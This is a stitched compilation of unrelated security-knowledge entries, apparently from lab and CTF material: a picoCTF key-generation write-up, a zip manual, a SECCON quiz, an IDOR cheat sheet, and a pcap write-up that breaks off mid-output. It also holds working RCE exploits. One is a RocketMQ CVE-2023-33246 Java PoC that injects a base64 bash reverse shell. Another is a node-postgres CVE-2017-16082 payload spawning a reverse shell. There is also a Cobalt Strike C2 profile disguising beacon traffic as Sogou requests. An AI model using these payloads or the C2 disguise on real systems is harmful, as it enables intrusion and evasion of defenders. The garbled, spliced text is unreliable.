GBQiy9e5N41GQ4MCpvzs87kV5spprXd_DOKnkjeC5bJDFUoIdMk5r-UO2boRH0tHONCbUOzw7HOgFcJUA13yjtvGGbfPPMHvhFMtMDMRw8gacd-5WHaLeh05yBy4UjT_9flAGAqYMWbvrhkAbwEYPJ0abxp1weANOcYZ-gMHm7kn9kF_eTpzKXxWsViR0AekfepQICVZI1eJzLjV2w6qWq7yDA2ALUxFW10GuEqhP9DI_OVVg6AILHPgokj0pcVA9zUizVTWaGnB1Te8_Zlw5Ik-MwNFPJHYLAug14JI4iYeY0zVsgvkpPJmg_dJD4U7Lr4PBwANvyz5NmGZiITqslCAwUDRMK10u3o2ZmSMn-MuBje_9NRYvh8SRvtbWCB46Yj1YMSJvaqci0MaJK8FdPeDPJ84uSK3eWzq75X96k9nVPnHPnlLkcls3480mlq_81V9MTWlLcvgqhEU4FxE7lGjSF9orw7HCK_9lx2rXwuFAaovFweQw2bu7Nr7pH1X82y0XQCI7aeP687QHdONEoIkWikG5Oub8kEGTBq1D4yeRLocq8dPSoRUAPOb6g-QVAOlu3fiJBGIikubJUWSdQ97pbLgxhnpCrRYS3uFZVo-4f5lnwBNEHrR7DuVc13M-rkUXO-oeqrz6Txmr-xAjYtWrg7IsMr-UPihTJC0Gsmm1FAlXtVOmuKYjwOV7DG4aPzE1MjDAHMWidls3ECcueaLdUV-oY6Hw3WwOK_Nnj10sPmWSFSuMPeOBwPEL2M-1tCkbOvilqccCAelhS87qU_fDUKzD68TV1tJIoXEKW4sdwAVGxguEv1BAm4G7LhrH08McB5n3ja5I_3IqkeYdyHaxAXJ-O2thg== """ # Enter main loop ui_flow() if jump_into_full: exec(full_version_code) ``` ## Solution Let's run the file: ```console ┌──(user@kali)-[/media/sf_CTFs/pico/keygenme-py] └─$ python3 keygenme-trial.py =============================================== Welcome to the Arcane Calculator, GOUGH! This is the trial version of Arcane Calculator. The full version may be purchased in person near the galactic center of the Milky Way galaxy. Available while supplies last! ===================================================== ___Arcane Calculator___ Menu: (a) Estimate Astral Projection Mana Burn (b) [LOCKED] Estimate Astral Slingshot Approach Vector (c) Enter License Key (d) Exit Arcane Calculator What would you like to do, GOUGH (a/b/c/d)? c Enter your license key: test Key is NOT VALID. Check your data entry. ``` The interesting part seems to be the license key. Here's how the key is checked: ```python def check_key(key, username_trial): global key_full_template_trial if len(key) != len(key_full_template_trial): return False else: # Check static base key part --v i = 0 for c in key_part_static1_trial: if key[i] != c: return False i += 1 # TODO : test performance on toolbox container # Check dynamic part --v if key[i] != hashlib.sha256(username_trial).hexdigest()[4]: return False else: i += 1 if key[i] != hashlib.sha256(username_trial).hexdigest()[5]: return False else: i += 1 if key[i] != hashlib.sha256(username_trial).hexdigest()[3]: return False else: i += 1 if key[i] != hashlib.sha256(username_trial).hexdigest()[6]: return False else: i += 1 if key[i] != hashlib.sha256(username_trial).hexdigest()[2]: return False else: i += 1 if key[i] != hashlib.sha256(username_trial).hexdigest()[7]: return False else: i += 1 if key[i] != hashlib.sha256(username_trial).hexdigest()[1]: return False else: i += 1 if key[i] != hashlib.sha256(username_trial).hexdigest()[8]: return False return True ``` It's called by `enter_license` with the user key and the `bUsername_trial` global: ```python >>> import importlib >>> keygenme = importlib.import_module("keygenme-trial") >>> keygenme.bUsername_trial b'GOUGH' ``` `check_key` starts by checking that the user key length is equal to the length of `key_full_template_trial` and it starts with the same characters as `key_part_static1_trial`. The rest of the key is composed of characters from `sha256(username_trial)` and the `key_part_static2_trial` suffix. So, to get the key, we just need to print: ```python >>> import hashlib >>> h = hashlib.sha256(keygenme.bUsername_trial).hexdigest() >>> print("{}{}{}".format(keygenme.key_part_static1_trial, "".join([h[4], h[5], h[3], h[6], h[2], h[7], h[1], h[8]]), keygenme.key_part_static2_trial)) picoCTF{1n_7h3_|<3y_of_f911a486} ``` Let's enter the key: ```console ┌──(user@kali)-[/media/sf_CTFs/pico/keygenme-py] └─$ python3 keygenme-trial.py =============================================== Welcome to the Arcane Calculator, GOUGH! This is the trial version of Arcane Calculator. The full version may be purchased in person near the galactic center of the Milky Way galaxy. Available while supplies last! ===================================================== ___Arcane Calculator___ Menu: (a) Estimate Astral Projection Mana Burn (b) [LOCKED] Estimate Astral Slingshot Approach Vector (c) Enter License Key (d) Exit Arcane Calculator What would you like to do, GOUGH (a/b/c/d)? c Enter your license key: picoCTF{1n_7h3_|<3y_of_f911a486} Full version written to 'keygenme.py'. Exiting trial version... =================================================== Welcome to the Arcane Calculator, tron! =================================================== ___Arcane Calculator___ Menu: (a) Estimate Astral Projection Mana Burn (b) Estimate Astral Slingshot Approach Vector (c) Exit Arcane Calculator What would you like to do, tron (a/b/c)? ``` We got the full version! The flag: `picoCTF{1n_7h3_|<3y_of_f911a486}`
sec-knowleage
zip === 可以用来解压缩文件 ## 补充说明 **zip命令** 可以用来解压缩文件,或者对文件进行打包操作。zip是个使用广泛的压缩程序,文件经它压缩后会另外产生具有“.zip”扩展名的压缩文件。 ### 语法 ```shell zip(选项)(参数) zip [-选项] [-b 路径] [-t 日期] [-n 后缀名] [压缩文件列表] [-xi 列表] ``` ### 选项 ```shell -A:调整可执行的自动解压缩文件; -b<工作目录>:指定暂时存放文件的目录; -c:替每个被压缩的文件加上注释; -d:从压缩文件内删除指定的文件; -D:压缩文件内不建立目录名称; -f:此参数的效果和指定“-u”参数类似,但不仅更新既有文件,如果某些文件原本不存在于压缩文件内,使用本参数会一并将其加入压缩文件中; -F:尝试修复已损坏的压缩文件; -g:将文件压缩后附加在已有的压缩文件之后,而非另行建立新的压缩文件; -h:在线帮助; -i<范本样式>:只压缩符合条件的文件; -j:只保存文件名称及其内容,而不存放任何目录名称; -J:删除压缩文件前面不必要的数据; -k:使用MS-DOS兼容格式的文件名称; -l:压缩文件时,把LF字符置换成LF+CR字符; -ll:压缩文件时,把LF+cp字符置换成LF字符; -L:显示版权信息; -m:将文件压缩并加入压缩文件后,删除原始文件,即把文件移到压缩文件中; -n<字尾字符串>:不压缩具有特定字尾字符串的文件; -o:以压缩文件内拥有最新更改时间的文件为准,将压缩文件的更改时间设成和该文件相同; -q:不显示指令执行过程; -r:递归处理,将指定目录下的所有文件和子目录一并处理; -S:包含系统和隐藏文件; -t<日期时间>:把压缩文件的日期设成指定的日期; -T:检查备份文件内的每个文件是否正确无误; -u:更换较新的文件到压缩文件内; -v:显示指令执行过程或显示版本信息; -V:保存VMS操作系统的文件属性; -w:在文件名称里假如版本编号,本参数仅在VMS操作系统下有效; -x<范本样式>:压缩时排除符合条件的文件; -X:不保存额外的文件属性; -y:直接保存符号连接,而非该链接所指向的文件,本参数仅在UNIX之类的系统下有效; -z:替压缩文件加上注释; -$:保存第一个被压缩文件所在磁盘的卷册名称; -<压缩效率>:压缩效率是一个介于1~9的数值。 ``` ### 参数 * zip压缩包:指定要创建的zip压缩包; * 文件列表:指定要压缩的文件列表。 ### 实例 将`/home/Blinux/html/`这个目录下所有文件和文件夹打包为当前目录下的html.zip: ```shell zip -q -r html.zip /home/Blinux/html ``` 上面的命令操作是将绝对地址的文件及文件夹进行压缩,以下给出压缩相对路径目录,比如目前在Bliux这个目录下,执行以下操作可以达到以上同样的效果: ```shell zip -q -r html.zip html ``` 比如现在我的html目录下,我操作的zip压缩命令是: ```shell zip -q -r html.zip * ``` 压缩 `example/basic/` 目录内容到 `basic.zip` 压缩包中 `-x` 指定排除目录,注意没有双引号将不起作用。 ```shell zip -r basic.zip example/basic/ -x "example/basic/node_modules/*" -x "example/basic/build/*" -x "example/basic/coverage/*" ``` 上面压缩解压出来,内容存放在 `example/basic/`, 如果想存放到根目录,进入目录进行压缩,目前没有找到一个合适的参数来解决此问题。 ``` cd example/basic/ && zip -r basic.zip . -x "node_modules/*" -x "build/*" -x "coverage/*" ``` 压缩效率选择: ```shell zip -9 # 1-9 faster->better ``` 创建 `public_html` 目录下忽略所有文件和文件夹,排除包括文本 `backup` 的所有文件。 ```shell $ zip -r public_html.zip public_html -x *backup* ``` `httpdocs` 目录忽略 `.svn` 文件或 `git` 的文件和目录下创建所有文件的归档。 ```shell $ zip -r httpdocs.zip httpdocs --exclude *.svn* --exclude *.git* ``` `httpdocs` 目录忽略的所有文件,并与 `.log` 结尾的目录下创建所有文件的归档。 ```shell $ zip -r httpdocs.zip httpdocs --exclude "*.log" ``` ### 问题解决 CentOS7中命令找不到 ```shell -Bash: Unzip: Command Not Found ``` 解决方法 ```shell yum install -y unzip zip ```
sec-knowleage
# Apache RocketMQ 远程命令执行漏洞(CVE-2023-33246) Apache RocketMQ是一个分布式消息平台。 在其5.1.0版本及以前存在一处命令执行漏洞,攻击者通过向其更新配置相关的功能发送指令即可更新任意配置项,并通过配置项中存在的命令注入功能执行任意命令。 参考链接: - <https://lists.apache.org/thread/1s8j2c8kogthtpv3060yddk03zq0pxyp> - <https://github.com/I5N0rth/CVE-2023-33246> ## 启动 执行如下命令启动一个RocketMQ 5.1.0: ```shell docker compose up -d ``` ## 漏洞复现 使用`IDEA`或`Eclipse`等`IDE`新建一个`Maven`项目,导入依赖: ```xml <dependencies> <!-- https://mvnrepository.com/artifact/org.apache.rocketmq/rocketmq-tools --> <dependency> <groupId>org.apache.rocketmq</groupId> <artifactId>rocketmq-tools</artifactId> <version>5.1.0</version> </dependency> </dependencies> ``` PoC如下: ```java import org.apache.rocketmq.tools.admin.DefaultMQAdminExt; import java.util.Base64; import java.util.Properties; public class Main { private static String getCmd(String ip, String port) { String cmd = "bash -i >& /dev/tcp/" + ip + "/" + port + " 0>&1"; String cmdBase = Base64.getEncoder().encodeToString(cmd.getBytes()); return "-c $@|sh . echo echo \"" + cmdBase + "\"|base64 -d|bash -i;"; } public static void main(String[] args) throws Exception { String targetHost = "192.168.227.128"; String targetPort = "10911"; String shellHost = "192.168.227.128"; String shellPort = "12345"; String targetAddr = String.format("%s:%s",targetHost,targetPort); Properties props = new Properties(); props.setProperty("rocketmqHome", getCmd(shellHost,shellPort)); props.setProperty("filterServerNums", "1"); DefaultMQAdminExt admin = new DefaultMQAdminExt(); admin.setNamesrvAddr("0.0.0.0:12345"); admin.start(); admin.updateBrokerConfig(targetAddr, props); Properties brokerConfig = admin.getBrokerConfig(targetAddr); System.out.println(brokerConfig.getProperty("rocketmqHome")); System.out.println(brokerConfig.getProperty("filterServerNums")); admin.shutdown(); } } ``` 在控制台成功输出新的配置后,请等待30秒左右,将可以看到`touch /tmp/success`已成功被执行: ![](screenshot.png) ## 简单分析 为什么要修改`filterServerNums`属性:如果配置的`filterServerNums`为0,计算得出的`more`也会是0,因此无法进入`callShell`方法执行命令。 ```java public void createFilterServer() { int more = this.brokerController.getBrokerConfig().getFilterServerNums() - this.filterServerTable.size(); String cmd = this.buildStartCommand(); for (int i = 0; i < more; i++) { FilterServerUtil.callShell(cmd, log); } } public static void callShell(final String shellString, final Logger log) { Process process = null; try { String[] cmdArray = splitShellString(shellString); process = Runtime.getRuntime().exec(cmdArray); process.waitFor(); log.info("CallShell: <{}> OK", shellString); } catch (Throwable e) { log.error("CallShell: readLine IOException, {}", shellString, e); } finally { if (null != process) process.destroy(); } } ``` 为什么要修改`rocketmqHome`属性:在构建命令的时候,最终会调用`splitShellString`方法按照空格对参数进行分割,所以不可以是`NamesrvAddr`参数,只能是开头的`rocketmqHome`参数,但是由于参数分割规则,所以需要更严格的命令和巧妙的技巧才可以执行。 ```java private String buildStartCommand() { String config = ""; if (BrokerStartup.CONFIG_FILE_HELPER.getFile() != null) { config = String.format("-c %s", BrokerStartup.CONFIG_FILE_HELPER.getFile()); } if (this.brokerController.getBrokerConfig().getNamesrvAddr() != null) { config += String.format(" -n %s", this.brokerController.getBrokerConfig().getNamesrvAddr()); } if (NetworkUtil.isWindowsPlatform()) { return String.format("start /b %s\\bin\\mqfiltersrv.exe %s", this.brokerController.getBrokerConfig().getRocketmqHome(), config); } else { return String.format("sh %s/bin/startfsrv.sh %s", this.brokerController.getBrokerConfig().getRocketmqHome(), config); } } ```
sec-knowleage
## Command-Line Quiz (Unknown, 100p) telnet caitsith.pwn.seccon.jp User:root Password:seccon The goal is to find the flag word by "somehow" reading all *.txt files. ###PL [ENG](#eng-version) Łączymy się ze wskazanym serwerem: ``` CaitSith login: root Password: $ ls bin flags.txt linuxrc stage1.txt stage4.txt usr dev init proc stage2.txt stage5.txt etc lib sbin stage3.txt tmp $ cat flags.txt cat: can't open 'flags.txt': Operation not permitted $ cat stage1.txt What command do you use when you want to read only top lines of a text file? Set your answer to environment variable named stage1 and execute a shell. $ stage1=$your_answer_here sh If your answer is what I meant, you will be able to access stage2.txt file. $ cat stage2.txt cat: can't open 'stage2.txt': Operation not permitted ``` Jesteśmy w stanie przeczytać tylko plik stage1.txt, kolejne są odblokowywane w momencie kiedy rozwiążemy poprzednie zagadki. Więc idziemy po kolei: ``` $ cat stage1.txt What command do you use when you want to read only top lines of a text file? Set your answer to environment variable named stage1 and execute a shell. $ stage1=$your_answer_here sh If your answer is what I meant, you will be able to access stage2.txt file. $ stage1=head sh $ cat stage2.txt What command do you use when you want to read only bottom lines of a text file? Set your answer to environment variable named stage2 and execute a shell. $ stage2=$your_answer_here sh If your answer is what I meant, you will be able to access stage3.txt file. $ stage2=tail sh $ cat stage3.txt What command do you use when you want to pick up lines that match specific patterns? Set your answer to environment variable named stage3 and execute a shell. $ stage3=$your_answer_here sh If your answer is what I meant, you will be able to access stage4.txt file. $ stage3=grep sh $ cat stage4.txt What command do you use when you want to process a text file? Set your answer to environment variable named stage4 and execute a shell. $ stage4=$your_answer_here sh If your answer is what I meant, you will be able to access stage5.txt file. $ stage4=awk sh $ cat stage5.txt OK. You reached the final stage. The flag word is in flags.txt file. flags.txt can be read by only one specific program which is available in this server. The program for reading flags.txt is one of commands you can use for processing a text file. Please find it. Good luck. ;-) $ sed -e '' flags.txt OK. You have read all .txt files. The flag word is shown below. SECCON{CaitSith@AQUA} ``` ### ENG version We connect to server pointed in description: ``` CaitSith login: root Password: $ ls bin flags.txt linuxrc stage1.txt stage4.txt usr dev init proc stage2.txt stage5.txt etc lib sbin stage3.txt tmp $ cat flags.txt cat: can't open 'flags.txt': Operation not permitted $ cat stage1.txt What command do you use when you want to read only top lines of a text file? Set your answer to environment variable named stage1 and execute a shell. $ stage1=$your_answer_here sh If your answer is what I meant, you will be able to access stage2.txt file. $ cat stage2.txt cat: can't open 'stage2.txt': Operation not permitted ``` We can only read stage1.txt file, other files are locked untill we solve earlier challenges. So we proceed step by step: ``` $ cat stage1.txt What command do you use when you want to read only top lines of a text file? Set your answer to environment variable named stage1 and execute a shell. $ stage1=$your_answer_here sh If your answer is what I meant, you will be able to access stage2.txt file. $ stage1=head sh $ cat stage2.txt What command do you use when you want to read only bottom lines of a text file? Set your answer to environment variable named stage2 and execute a shell. $ stage2=$your_answer_here sh If your answer is what I meant, you will be able to access stage3.txt file. $ stage2=tail sh $ cat stage3.txt What command do you use when you want to pick up lines that match specific patterns? Set your answer to environment variable named stage3 and execute a shell. $ stage3=$your_answer_here sh If your answer is what I meant, you will be able to access stage4.txt file. $ stage3=grep sh $ cat stage4.txt What command do you use when you want to process a text file? Set your answer to environment variable named stage4 and execute a shell. $ stage4=$your_answer_here sh If your answer is what I meant, you will be able to access stage5.txt file. $ stage4=awk sh $ cat stage5.txt OK. You reached the final stage. The flag word is in flags.txt file. flags.txt can be read by only one specific program which is available in this server. The program for reading flags.txt is one of commands you can use for processing a text file. Please find it. Good luck. ;-) $ sed -e '' flags.txt OK. You have read all .txt files. The flag word is shown below. SECCON{CaitSith@AQUA} ```
sec-knowleage
# Insecure Direct Object References > Insecure Direct Object References occur when an application provides direct access to objects based on user-supplied input. As a result of this vulnerability attackers can bypass authorization and access resources in the system directly, for example database records or files. - OWASP ## Summary * [Tools](#tools) * [Exploit](#exploit) * [IDOR Tips](#idor-tips) * [Examples](#examples) * [References](#references) ## Tools - [BApp Store > Authz](https://portswigger.net/bappstore/4316cc18ac5f434884b2089831c7d19e) - [BApp Store > AuthMatrix](https://portswigger.net/bappstore/30d8ee9f40c041b0bfec67441aad158e) - [BApp Store > Autorize](https://portswigger.net/bappstore/f9bbac8c4acf4aefa4d7dc92a991af2f) ## Exploit The value of a parameter is used directly to retrieve a database record. ```powershell http://foo.bar/somepage?invoice=12345 ``` The value of a parameter is used directly to perform an operation in the system ```powershell http://foo.bar/changepassword?user=someuser ``` The value of a parameter is used directly to retrieve a file system resource ```powershell http://foo.bar/showImage?img=img00011 ``` The value of a parameter is used directly to access application functionality ```powershell http://foo.bar/accessPage?menuitem=12 ``` ### IDOR Tips * Change the HTTP request: POST → PUT * Change the content type: XML → JSON * Increment/decrement numerical values (1,2,3,..) * GUID/UUID might be weak * Transform numerical values to arrays: `{"id":19} → {"id":[19]}` ## Examples * [HackerOne - IDOR to view User Order Information - meals](https://hackerone.com/reports/287789) * [HackerOne - IDOR on HackerOne Feedback Review - japz](https://hackerone.com/reports/262661) ## Labs * [Insecure direct object references](https://portswigger.net/web-security/access-control/lab-insecure-direct-object-references) ## References * [OWASP - Testing for Insecure Direct Object References (OTG-AUTHZ-004)](https://www.owasp.org/index.php/Testing_for_Insecure_Direct_Object_References_(OTG-AUTHZ-004)) * [OWASP - Insecure Direct Object Reference Prevention Cheat Sheet](https://www.owasp.org/index.php/Insecure_Direct_Object_Reference_Prevention_Cheat_Sheet) * [BUGCROWD - How-To: Find IDOR (Insecure Direct Object Reference) Vulnerabilities for large bounty rewards - Sam Houton](https://www.bugcrowd.com/blog/how-to-find-idor-insecure-direct-object-reference-vulnerabilities-for-large-bounty-rewards/) * [IDOR tweet as any user](http://kedrisec.com/twitter-publish-by-any-user/) by kedrisec * [Manipulation of ETH balance](https://www.vicompany.nl/magazine/from-christmas-present-in-the-blockchain-to-massive-bug-bounty) * [Viewing private Airbnb Messages](http://buer.haus/2017/03/31/airbnb-web-to-app-phone-notification-idor-to-view-everyones-airbnb-messages/) * [Hunting Insecure Direct Object Reference Vulnerabilities for Fun and Profit (PART-1) - Mohammed Abdul Raheem - Feb 2, 2018](https://codeburst.io/hunting-insecure-direct-object-reference-vulnerabilities-for-fun-and-profit-part-1-f338c6a52782)
sec-knowleage
# node-postgres 代码执行漏洞(CVE-2017-16082) ## 漏洞原理 node-postgres在处理类型为`Row Description`的postgres返回包时,将字段名拼接到代码中。由于没有进行合理转义,导致一个特殊构造的字段名可逃逸出代码单引号限制,造成代码执行漏洞。 参考链接: - https://www.leavesongs.com/PENETRATION/node-postgres-code-execution-vulnerability.html - https://node-postgres.com/announcements#2017-08-12-code-execution-vulnerability - https://zhuanlan.zhihu.com/p/28575189 ## 漏洞复现 编译及运行环境: ``` docker compose build docker compose up -d ``` 成功运行后,访问`http://your-ip:3000/?id=1`即可查看到id为1的用户信息,用sqlmap即可发现此处存在注入点,且数据库为postgres: ![](img/1.png) 那么,我们就可以猜测这里存在node-postgres的代码执行漏洞。编写我想执行的命令`echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTkuMC4xLzIxIDA+JjE=|base64 -d|bash`,然后适当分割(每段长度不超过64字符)后替换在如下payload中: ``` SELECT 1 AS "\']=0;require=process.mainModule.constructor._load;/*", 2 AS "*/p=require(`child_process`);/*", 3 AS "*/p.exec(`echo YmFzaCAtaSA+JiAvZGV2L3Rj`+/*", 4 AS "*/`cC8xNzIuMTkuMC4xLzIxIDA+JjE=|base64 -d|bash`)//" ``` 将上述payload编码后发送: ![](img/2.png) 成功执行命令,如反弹shell: ![](img/3.png) 因为复现过程中坑比较多,payload生成与测试过程中如果出现错误,还请多多阅读[我的这篇文章](https://www.leavesongs.com/PENETRATION/node-postgres-code-execution-vulnerability.html),从原理上找到问题所在。
sec-knowleage
# 0x00 profile编写 先设置Beacon的默认值 ``` # # #Author :@404 # # set sleeptime "3000"; set jitter "10"; set useragent "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"; ``` 设置心跳时间为3s,jitter随便但是不要太大这是心跳时间抖动。然后设置我们的get请求 ``` http-get{ set uri "/hdq=sogou-wsse-3f7bcd0b3ea82268&ie=utf-8&query=1"; client { header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8"; header "Host" "www.sogou.com"; header "Referer" "https://www.qq.com/"; metadata { base64; prepend "session="; header "Cookie"; } } server { header "Server" "nginx"; header "X-Log-Ext" "antiforbidden=1&exp_1=1&exp_2=1"; output { print; } } } ``` client: 设置url 目标机器请求的header头和参数,其中metadata的流传如下 0|开始|过程|数据 -|-|-|-| 1 | 开始 | null | test 2 | base64 | base64 encode | dGVzdA== 3 | prepend "session=" | 获取字符串组合 | session=dGVzdA== 4 | header "Cookie" | 储存在cookie字段中 |Cookie:session=dGVzdA== server: 为服务器返回给他的数据 output: print 发送数据 ``` http-post{ set uri "/hdq=&query=1"; client { header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8"; header "Host" "www.sogou.com"; header "X-Requested-With" "XMLHttpRequest"; header "Referer" "https://www.qq.com/"; id { parameter "aleen"; } output { base64; print; } } server { header "Server" "nginx"; header "X-Log-Ext" "antiforbidden=1&exp_1=1&exp_2=1"; output { print; } } } ``` POST类似但是要把metadata换成id,id中aleen参数插入随机数 也可以指定如parameter "aleen" "isme", output这里用的base64编码输出,其他类似。 然后组成如下脚本 ``` # # #Author :@404 # # set sleeptime "3000"; set jitter "10"; set useragent "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"; http-get{ set uri "/hdq=sogou-wsse-3f7bcd0b3ea82268&ie=utf-8&query=1"; client { header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8"; header "Host" "www.sogou.com"; header "Referer" "https://www.qq.com/"; metadata { base64; prepend "session="; header "Cookie"; } } server { header "Server" "nginx"; header "X-Log-Ext" "antiforbidden=1&exp_1=1&exp_2=1"; output { print; } } } http-post{ set uri "/hdq=&query=1"; client { header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8"; header "Host" "www.sogou.com"; header "X-Requested-With" "XMLHttpRequest"; header "Referer" "https://www.qq.com/"; id { parameter "aleen"; } output { base64; print; } } server { header "Server" "nginx"; header "X-Log-Ext" "antiforbidden=1&exp_1=1&exp_2=1"; output { print; } } } ``` 运行 ./c2lint ``` [+] Profile compiled OK http-get -------- GET /hdq=sogou-wsse-3f7bcd0b3ea82268&ie=utf-8&query=1 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Host: www.sogou.com Referer: https://www.qq.com/ Cookie: session=CaY+3QMvbHC266iAYrHLWg== User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 HTTP/1.1 200 OK Server: nginx X-Log-Ext: antiforbidden=1&exp_1=1&exp_2=1 Content-Length: 64 .Gf...!.p(...3.I......T.O..s./.r.A.....`M........+m.....]m....4: http-post --------- POST /hdq=&query=1?aleen=88225 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Host: www.sogou.com X-Requested-With: XMLHttpRequest Referer: https://www.qq.com/ Content-Length: 24 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 1Fk7/RwM3u36an1hXuJSEA== HTTP/1.1 200 OK Server: nginx X-Log-Ext: antiforbidden=1&exp_1=1&exp_2=1 Content-Length: 0 ``` c2lint 可以为我们测试脚本数据以及代码的bug 一路绿灯说明你的代码是没的问题的,这只是个简单的脚本你可以编写更加困难的。 # 0x01 文末 ### 本文如有错误,请及时提醒,以免误导他人
sec-knowleage
# CypLogin * Category: Web / Forensics * 150 points ## Description > To exchange new information in a secure environment, you should use our cryptographic new login rather the simple one. > > However, can you bypass its protections and get the flag anyway? A PCAP file and a `tlskey.log` file were attached. ## Solution Solved this one after the CTF ended with a hint from the admin (🙏). Let's take a look at the PCAP we got. The `tlskey.log` file allows us to view HTTPS traffic. ```console ┌──(user@kali)-[/media/sf_CTFs/appsec/CypLogin] └─$ tshark -r dump.pcapng -o "tls.desegment_ssl_records: TRUE" -o "tls.desegment_ssl_application_data: TRUE" -o "tls.keylog_file:/media/sf_CTFs/appsec/CypLogin/tlskey.log" | tail -n 30 568 51.709221 172.26.255.42 → 172.26.240.1 DNS 87 Standard query 0x4897 A cyplogin.appsecil.ctf.today 569 51.709275 172.26.255.42 → 3.70.105.34 HTTP2 512 HEADERS[37]: GET /login_api.php?un=clgyMHRibThGaVR3OElsZkpnN3NZamo2TDM3RjhmUzF4S0pyWlhXK3J4MTdDang1S2RWcWxDUFZVWEx6S3B1RkxOTk96TzRsbUZQSEVGa0xDTTZLTUFldW9JT3FFS0lnKzcwSWU0MzZCNHFveFFqSFRkYVR3c3JkclBBcHIwVkk5Y3p5bUFQMzhQSnJlUlZUWDVySlUvMkFxajZNSmZIZGlRYjhVc2tvMUZKTGhScE03SzVQbzkvNzZpdHJTdE9OazNnc1JMZzNkdGQ3Y2UxdGIzY3BEYXJUbnA4T0VTY0tpVXdnNFQwR3RHM25UOEFFZ0V3Z3Q3L2NYRnA0c0JURmFmeEtSd2hmNWJ0TFNjZ1hXWjgvZlRVMGJ4d1hBdmFGTzVXamt2WFdrOEJYRTBuakovVFdpOUZsSGJCUnBEK0RXVXdGOUxsTGU2VFhzQWUzMStwS3JBPT0=, WINDOW_UPDATE[37] 570 51.709886 172.26.240.1 → 172.26.255.42 DNS 146 Standard query response 0x4897 A cyplogin.appsecil.ctf.today A 3.70.105.34 A 52.29.18.37 571 51.710118 172.26.255.42 → 172.26.240.1 DNS 87 Standard query 0x5583 A cyplogin.appsecil.ctf.today 572 51.710677 172.26.240.1 → 172.26.255.42 DNS 146 Standard query response 0x5583 A cyplogin.appsecil.ctf.today A 3.70.105.34 A 52.29.18.37 573 51.711419 172.26.255.42 → 172.26.240.1 DNS 87 Standard query 0x6c69 A cyplogin.appsecil.ctf.today 574 51.711557 172.26.255.42 → 3.70.105.34 HTTP2 509 HEADERS[39]: GET /login_api.php?un=ZHkxM0paenRuakwyOXkyYlJvWEZGc0wwV2g2OVI0QnVlRG4yRC94YW1nL3pSZGRJeU9ObDlHY0wvTTRwWkFOYUFBNjl4aGJSa2cxTkxBT0dUWEY5bEFKTERqNXB4dkE4bnBZQ3krZTFxa0owQTB2eGpQN2R2Wk1iN0ZqWi8wRGZNbzJNZzBja2p4bjFlK1c3VDdDVDMvazlCR0Q4cktXYWNTS3loczBMYXYvcG1KQmVjcTJXMnBCUzRYWXF2OWFuUC95ZHc5NDhxYmovam9PVWU5M21CVUFPWnNVWUl6VENuYmhPS1hJak9rSUVLcGVNaVFKM3NDMTJoT2lRR2lWa2k4bDlyNTdkaVJPWXlQZU56UnRjSHVOYm9peTVsNTNmUnJpQlQrSk45cFpJRm5iN1QxUkdaamtvclhxZ3NpVzhsc1BzN1BXSS9GMmdVUUEwVmxEcnZBPT0=, WINDOW_UPDATE[39] 575 51.711949 172.26.240.1 → 172.26.255.42 DNS 146 Standard query response 0x6c69 A cyplogin.appsecil.ctf.today A 3.70.105.34 A 52.29.18.37 576 51.712134 172.26.255.42 → 172.26.240.1 DNS 87 Standard query 0xf5e3 A cyplogin.appsecil.ctf.today 577 51.712567 172.26.240.1 → 172.26.255.42 DNS 146 Standard query response 0xf5e3 A cyplogin.appsecil.ctf.today A 3.70.105.34 A 52.29.18.37 578 51.777997 3.70.105.34 → 172.26.255.42 HTTP2 286 HEADERS[37]: 200 OK, DATA[37] 579 51.778218 3.70.105.34 → 172.26.255.42 HTTP2 85 DATA[37] (text/html) 580 51.779616 3.70.105.34 → 172.26.255.42 HTTP2 286 HEADERS[39]: 200 OK, DATA[39] 581 51.779824 3.70.105.34 → 172.26.255.42 HTTP2 85 DATA[39] (text/html) 582 55.374655 172.26.255.42 → 172.26.240.1 DNS 87 Standard query 0x3a1c A cyplogin.appsecil.ctf.today 583 55.374880 172.26.255.42 → 3.70.105.34 HTTP2 510 HEADERS[41]: GET /login_api.php?un=bVVoNkJnNlN4NVR3L2svaExmQWpIM0J4RTRnK2xVUXRUSVlRd2JTcm1SV2ljRmN3QjJTSDBmZWQrRnBycUxEVXRpR2lwRnhGN1o5ZkZCNGYzcFh2NmttR05XdnROWktkWTl5STU4QnFaZGNjZHFWSFh1RUtxOGFkUmFLLzRuWmwwNTM1c2QrOElvWG13eThtQ0lwalhoU3gvaEtSTkJHU3VOZytvMStQNFg2M0tRbkU2UFQzSDhBNlRDT0Y4NTJkVThlWENoVlFRT3BZdEtLTTNpMHI0UVN2R2YvdVlLVGhqSUFtbmVSRnhZbFkyOXM5eE04QjhUSUFSMWZzSUE4QzRPL25GYy81TTdSMllXSFVsS1J0WFIzRjdiN25iRUUwS2JkdG9XTnpZck1LQjcyQTk0ZWxYb0RXOEswWFlkT0x1Vk8xd0RKV0xudUhCKzZIUjNteVBBPT0=, WINDOW_UPDATE[41] 584 55.375253 172.26.240.1 → 172.26.255.42 DNS 146 Standard query response 0x3a1c A cyplogin.appsecil.ctf.today A 3.70.105.34 A 52.29.18.37 585 55.375484 172.26.255.42 → 172.26.240.1 DNS 87 Standard query 0xb008 A cyplogin.appsecil.ctf.today 586 55.376027 172.26.240.1 → 172.26.255.42 DNS 146 Standard query response 0xb008 A cyplogin.appsecil.ctf.today A 3.70.105.34 A 52.29.18.37 587 55.376171 172.26.255.42 → 